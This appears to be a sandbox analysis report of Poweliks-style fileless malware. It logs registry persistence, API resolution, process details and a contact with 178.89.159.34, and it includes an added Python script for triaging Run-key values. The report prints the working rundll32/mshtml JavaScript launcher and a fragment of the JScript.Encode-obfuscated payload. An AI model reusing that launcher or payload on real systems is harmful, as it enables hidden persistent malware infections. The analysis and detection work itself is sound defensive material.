AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 1
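The three Run-key writes above are the whole persistence mechanism: the encoded script (the value beginning with the JScript.Encode marker `#@~^`) is stored in the key's (Default) value, and the `rundll32.exe javascript:` launcher reads it back at logon via `RegRead("HKCU\\...\\run\\")` (the trailing backslash selects the default value) and evaluates it inside mshtml. The following is an added example, not part of the VMRay report: a triage routine that takes a dictionary of Run-key value names and data, flags the launcher pattern, recognises a JScript.Encode payload and reads the plaintext length its header declares, and flags value names containing non-printable characters. The sample values are constructed: the launcher and the blob head are copied from the report (the blob is truncated), while the NUL-prefixed value name and the benign OneDrive entry are assumptions made for the example.

```python
import base64
import re
import struct
import unicodedata

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# values. Launcher and encoded-script data are taken from the report above;
# the value names are assumptions for this example (an empty name is the
# (Default) value, which is what RegRead("...\\run\\") returns).
SAMPLE_RUN_VALUES = {
    "\u0000a": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")',
    "": r"#@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n (truncated here)",
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

# Patterns that identify the rundll32/mshtml JavaScript launcher.
LAUNCHER_PATTERNS = [
    re.compile(r"rundll32(\.exe)?\s+javascript:", re.I),
    re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I),
    re.compile(r"WScript\.Shell.*RegRead", re.I | re.S),
]

ENCODE_MARKER = "#@~^"


def is_launcher(data):
    """True if the value data matches any launcher pattern."""
    return any(p.search(data) for p in LAUNCHER_PATTERNS)


def jscript_encode_length(data):
    """Return the body length declared in a JScript.Encode header, else None.

    Header layout: '#@~^' followed by 8 base64 characters that decode to a
    little-endian uint32 holding the length of the encoded script body.
    """
    if not data.startswith(ENCODE_MARKER) or len(data) < 12:
        return None
    try:
        raw = base64.b64decode(data[4:12])
    except ValueError:
        return None
    if len(raw) != 4:
        return None
    return struct.unpack("<I", raw)[0]


def has_hidden_name(name):
    """True if the value name contains control or other non-printable code points."""
    return any(unicodedata.category(ch).startswith("C") for ch in name)


def triage_run_values(values):
    """Return [(value_name, [reasons])] for every suspicious Run value."""
    findings = []
    for name, data in values.items():
        reasons = []
        if has_hidden_name(name):
            reasons.append("non-printable value name")
        if is_launcher(data):
            reasons.append("rundll32/mshtml JavaScript launcher")
        declared = jscript_encode_length(data)
        if declared is not None:
            reasons.append(f"JScript.Encode payload, declared body length {declared}")
        if reasons:
            findings.append((name, reasons))
    return findings


def poweliks_chain_present(values):
    """True when a launcher value exists and the (Default) value it reads back
    holds an encoded script, i.e. the two halves of the fileless chain are both there."""
    launcher = any(is_launcher(d) for d in values.values())
    default_encoded = jscript_encode_length(values.get("", "")) is not None
    return launcher and default_encoded


if __name__ == "__main__":
    for name, reasons in triage_run_values(SAMPLE_RUN_VALUES):
        print(repr(name), "->", "; ".join(reasons))
    print("Poweliks-style chain present:", poweliks_chain_present(SAMPLE_RUN_VALUES))
```

The header of the blob in the report, `kXcAAA==`, declares a body of 30609 characters; with the 12-character header, the 12-character checksum/trailer and the terminating NUL that gives 30634 UTF-16 characters, which is consistent with the 61268-byte REG_SZ size the sandbox logged. The value-name check matters because the sandbox shows no `value_name` for these writes at all: a name that starts with a non-printable character is dropped by most tooling and cannot be opened in regedit, so a triage script should enumerate names as raw strings rather than trusting what a GUI displays.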
Module (105)
Operation Module Additional Information Success Count
Load KERNEL32.DLL base_address = 0x765b0000 True 1
Load ntdll.dll base_address = 0x77560000 True 1
Load WS2_32.dll base_address = 0x75380000 True 1
Load SHLWAPI.dll base_address = 0x77100000 True 1
Load WININET.dll base_address = 0x76be0000 True 1
Load RPCRT4.dll base_address = 0x753c0000 True 1
Load imagehlp.dll base_address = 0x75760000 True 1
Load USERENV.dll base_address = 0x74a50000 True 1
Load ADVAPI32.dll base_address = 0x76760000 True 1
Load ole32.dll base_address = 0x75570000 True 1
Load msvcrt.dll base_address = 0x75260000 True 1
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77560000 True 1
Get Handle c:\windows\syswow64\ws2_32.dll base_address = 0x75380000 True 1
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x77100000 True 1
Get Handle c:\windows\syswow64\wininet.dll base_address = 0x76be0000 True 1
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x753c0000 True 1
Get Handle c:\windows\syswow64\imagehlp.dll base_address = 0x75760000 True 1
Get Handle c:\windows\syswow64\userenv.dll base_address = 0x74a50000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 2
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76760000 True 1
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75570000 True 1
Get Handle c:\windows\syswow64\dllhost.exe base_address = 0x190000 True 1
Get Filename c:\windows\syswow64\dllhost.exe process_name = c:\windows\syswow64\dllhost.exe, file_name_orig = C:\Windows\syswow64\dllhost.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x765c1856 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x765c1245 True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x765c1222 True 2
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x775ad2f3 True 2
Get Address c:\windows\syswow64\ws2_32.dll function = 16 (ordinal 16 = recv), address_out = 0x75386b0e True 2
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrA, address_out = 0x7712c45b True 2
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x76bed075 True 2
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x753e7c12 True 2
Get Address c:\windows\syswow64\imagehlp.dll function = CheckSumMappedFile, address_out = 0x75768303 True 2
Get Address c:\windows\syswow64\userenv.dll function = CreateEnvironmentBlock, address_out = 0x74a51a7a True 2
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7677469d True 2
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x7558b636 True 2
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x776354a7 True 1
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x775d5c30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x775801b4 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueryValueKey, address_out = 0x7757fa98 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwQueueApcThread, address_out = 0x7757ff14 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x7757fb30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x776298c3 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77634760 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x775d9d88 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlImageNtHeader, address_out = 0x77593164 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x7759ad68 True 1
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x7758df20 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 115 (ordinal 115 = WSAStartup), address_out = 0x75383ab2 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 3 (ordinal 3 = closesocket), address_out = 0x75383918 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 19 (ordinal 19 = send), address_out = 0x75386f01 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 4 (ordinal 4 = connect), address_out = 0x75386bdd True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52 (ordinal 52 = gethostbyname), address_out = 0x75397673 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 23 (ordinal 23 = socket), address_out = 0x75383eb8 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathUnquoteSpacesA, address_out = 0x7712ecc7 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameA, address_out = 0x771100aa True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrCmpNIA, address_out = 0x7710d11c True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrChrA, address_out = 0x7710c5e6 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x7710d250 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitThread, address_out = 0x775bd598 (address lies in the ntdll.dll range: kernel32 forwards ExitThread to ntdll!RtlExitUserThread) True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x765c7a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x765c14b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventA, address_out = 0x765c328c True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateThread, address_out = 0x765c7a2f True 1
Get Address c:\windows\syswow64\kernel32.dll function = WinExec, address_out = 0x76642c21 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x765c1282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x765c53c6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempFileNameA, address_out = 0x765e9d3f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathA, address_out = 0x765e276c True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x765c10ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x765dd802 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeThread, address_out = 0x765dd5b5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x765c1136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ResumeThread, address_out = 0x765c43ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteProcessMemory, address_out = 0x765dd9e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAllocEx, address_out = 0x765dd9b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x765c1072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x765deb39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x765c110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x765c3519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x765c1410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x765c49d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x765c3e8e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x765c11c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x765c186e True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x767714d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x767746ad True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x767748ef True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x767714b3 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76771469 True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76774304 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = _beginthreadex, address_out = 0x7527132e True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x765c195e True 1
System (3)
Operation Additional Information Success Count
Sleep duration = 5000 milliseconds (5.000 seconds) True 2
Get Info type = Operating System False 1
Network Behavior
DNS (1)
Operation Additional Information Success Count
Resolve Name host = 178.89.159.34, address_out = 178.89.159.34 True 1
Process #5: rundll32.exe
(Host: 32, Network: 0)
Information Value
ID #5
File Name c:\windows\system32\rundll32.exe
Command Line "C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:14, Reason: Autostart
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:00:58
OS Process Information
Information Value
PID 0x674
Parent PID 0x54c (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f4f9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x678
0x338
0x4F4
0x55C
0x544
0x598
0x5DC
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True True False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002c0000 0x002c0000 0x002c1fff Pagefile Backed Memory Readable True False False
msctf.dll.mui 0x002d0000 0x002d0fff Memory Mapped File Readable, Writable False False False
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True True False
private_0x00000000002f0000 0x002f0000 0x0032ffff Private Memory Readable, Writable True True False
oleaccrc.dll 0x00330000 0x00330fff Memory Mapped File Readable False False False
wshom.ocx 0x00340000 0x00353fff Memory Mapped File Readable False False False
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005f0000 0x005f0000 0x00770fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000780000 0x00780000 0x01b7ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001b80000 0x01b80000 0x01ec2fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001ed0000 0x01ed0000 0x01ed1fff Pagefile Backed Memory Readable True False False
scrrun.dll 0x01ee0000 0x01eeffff Memory Mapped File Readable False False False
pagefile_0x0000000001ef0000 0x01ef0000 0x01ef0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001f00000 0x01f00000 0x01f01fff Pagefile Backed Memory Readable True False False
cversions.1.db 0x01f10000 0x01f13fff Memory Mapped File Readable True False False
cversions.2.db 0x01f10000 0x01f13fff Memory Mapped File Readable True False False
pagefile_0x0000000001f20000 0x01f20000 0x01f20fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001f30000 0x01f30000 0x01faffff Private Memory Readable, Writable True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db 0x01fb0000 0x01fcafff Memory Mapped File Readable True False False
cversions.2.db 0x01fd0000 0x01fd3fff Memory Mapped File Readable True False False
private_0x0000000001fe0000 0x01fe0000 0x0205ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002060000 0x02060000 0x0213efff Pagefile Backed Memory Readable True False False
private_0x0000000002160000 0x02160000 0x021dffff Private Memory Readable, Writable True False False
pagefile_0x00000000021e0000 0x021e0000 0x025d2fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x025e0000 0x028aefff Memory Mapped File Readable False False False
private_0x00000000028b0000 0x028b0000 0x029affff Private Memory Readable, Writable True True False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db 0x029b0000 0x029dffff Memory Mapped File Readable True False False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x029e0000 0x02a45fff Memory Mapped File Readable True False False
private_0x0000000002a90000 0x02a90000 0x02b0ffff Private Memory Readable, Writable True True False
private_0x0000000002b80000 0x02b80000 0x02bfffff Private Memory Readable, Writable True False False
private_0x0000000002c50000 0x02c50000 0x02ccffff Private Memory Readable, Writable True True False
private_0x0000000002cd0000 0x02cd0000 0x02d4ffff Private Memory Readable, Writable True False False
private_0x0000000002d50000 0x02d50000 0x02dcffff Private Memory Readable, Writable True False False
ieframe.dll 0x02dd0000 0x03986fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000003990000 0x03990000 0x03a8ffff Private Memory Readable, Writable True True False
private_0x0000000003a90000 0x03a90000 0x03b90fff Private Memory Readable, Writable True True False
private_0x0000000003bf0000 0x03bf0000 0x03c6ffff Private Memory Readable, Writable True False False
staticcache.dat 0x03c70000 0x0459ffff Memory Mapped File Readable False False False
user32.dll 0x77860000 0x77959fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x77960000 0x77a7efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77a80000 0x77c28fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77c50000 0x77c56fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
rundll32.exe 0xff9f0000 0xff9fefff Memory Mapped File Readable, Writable, Executable False False False
jscript.dll 0x7fef4900000 0x7fef49e2fff Memory Mapped File Readable, Writable, Executable True False False
ieframe.dll 0x7fef49f0000 0x7fef55a6fff Memory Mapped File Readable, Writable, Executable False False False
oleacc.dll 0x7fef55b0000 0x7fef5603fff Memory Mapped File Readable, Writable, Executable False False False
mshtml.dll 0x7fef63d0000 0x7fef6c67fff Memory Mapped File Readable, Writable, Executable False False False
msls31.dll 0x7fef73a0000 0x7fef73dafff Memory Mapped File Readable, Writable, Executable False False False
mpr.dll 0x7fefacb0000 0x7fefacc7fff Memory Mapped File Readable, Writable, Executable False False False
scrrun.dll 0x7fefada0000 0x7fefadd3fff Memory Mapped File Readable, Writable, Executable False False False
wshom.ocx 0x7fefb060000 0x7fefb087fff Memory Mapped File Readable, Writable, Executable False False False
msimtf.dll 0x7fefb090000 0x7fefb09dfff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x7fefb400000 0x7fefb417fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefb860000 0x7fefb8b5fff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x7fefc350000 0x7fefc47bfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x7fefc4d0000 0x7fefc6c3fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x7fefc9c0000 0x7fefc9ecfff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefcb90000 0x7fefcb9bfff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefcfc0000 0x7fefd006fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefd2c0000 0x7fefd2d6fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x7fefd890000 0x7fefd8b4fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefd8c0000 0x7fefd8cefff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x7fefd8d0000 0x7fefd960fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x7fefd9b0000 0x7fefd9c3fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefd9d0000 0x7fefd9defff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x7fefda70000 0x7fefda7efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x7fefdb20000 0x7fefdc86fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefdc90000 0x7fefdcfafff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x7fefdd00000 0x7fefdd35fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x7fefdd40000 0x7fefdd59fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdda0000 0x7fefde3efff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefde40000 0x7fefebc7fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefebd0000 0x7fefecfcfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefed00000 0x7fefed2dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefed30000 0x7fefed96fff Memory Mapped File Readable, Writable, Executable False False False
imagehlp.dll 0x7fefeda0000 0x7fefedb6fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefee10000 0x7fefeea8fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefeeb0000 0x7fefefb8fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefefc0000 0x7feff088fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x7feff110000 0x7feff239fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x7feff240000 0x7feff291fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff2a0000 0x7feff2befff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7feff2c0000 0x7feff2cdfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff2d0000 0x7feff3aafff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7feff3b0000 0x7feff486fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7feff490000 0x7feff500fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x7feff5b0000 0x7feff808fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x7feff810000 0x7feff987fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7feff990000 0x7feffb92fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x7feffba0000 0x7feffd76fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffda0000 0x7feffda0fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True True False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True True False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True True False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True True False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True True False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True True False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Host Behavior
Registry (4)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
